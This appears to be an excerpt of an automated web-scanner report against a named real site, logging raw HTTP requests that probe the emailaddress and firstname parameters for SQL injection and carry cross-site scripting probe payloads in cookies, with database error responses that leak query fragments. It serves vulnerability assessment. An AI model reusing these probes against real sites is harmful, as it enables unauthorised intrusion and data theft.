Referer: http://www.insideup.com/ppc/leadflow/deco00/project.php?catId=30009&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=7DCBAF96E588A764816BB2D777B6D36B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 06:55:36 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=vua03l74luq6i8f4475v19v5f1; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 17345


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...

1.223. http://www.insideup.com/ppc/leadflow/deco00/project.php [emailaddress parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/deco00/project.php

Issue detail

The emailaddress parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the emailaddress parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/deco00/project.php?catId=30009&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_387=1892__Collect+from+businesses+only&attributeId_388=1896__%24500+-+1%2c000&attributeId_389=1905__1&attributeId_390=1912__Less+than+2+months&attributeId_391=1919__This+is+the+first+time&attributeId_392=1924__Yes&button3=Submit&companyname=Company+Name&emailaddress=Email'&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30009&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/deco00/project.php?catId=30009&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=7DCBAF96E588A764816BB2D777B6D36B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 06:56:02 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=5pk7tt47dh2duqrea590jdvuj1; path=/
Content-Length: 6334
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
s the first time&attributeId_392=1924__Yes&button3=Submit&companyname=Company Name&emailaddress=Email'&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30009&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Name&lastname=Last Name&phone=Phone&subcategoryId=30009&website=n/a&zip=Zip code' at line 5

Request 2

GET /ppc/leadflow/deco00/project.php?catId=30009&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_387=1892__Collect+from+businesses+only&attributeId_388=1896__%24500+-+1%2c000&attributeId_389=1905__1&attributeId_390=1912__Less+than+2+months&attributeId_391=1919__This+is+the+first+time&attributeId_392=1924__Yes&button3=Submit&companyname=Company+Name&emailaddress=Email''&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30009&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/deco00/project.php?catId=30009&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=7DCBAF96E588A764816BB2D777B6D36B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 06:56:06 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=jslcupc0t3k7134ghb4riar607; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 17345


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...

1.224. http://www.insideup.com/ppc/leadflow/deco00/project.php [firstname parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/deco00/project.php

Issue detail

The firstname parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the firstname parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/deco00/project.php?catId=30009&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_387=1892__Collect+from+businesses+only&attributeId_388=1896__%24500+-+1%2c000&attributeId_389=1905__1&attributeId_390=1912__Less+than+2+months&attributeId_391=1919__This+is+the+first+time&attributeId_392=1924__Yes&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name'&lastname=Last+Name&phone=Phone&subcategoryId=30009&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/deco00/project.php?catId=30009&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=7DCBAF96E588A764816BB2D777B6D36B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 06:56:34 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=jq92o6igdlg36iikbqo1eqi0h3; path=/
Content-Length: 6334
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
s the first time&attributeId_392=1924__Yes&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name'&lastname=Last Name&phone=Phone&subcategoryId=30009&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Name&phone=Phone&subcategoryId=30009&website=n/a&zip=Zip code' OR prj.project_pa' at line 5

Request 2

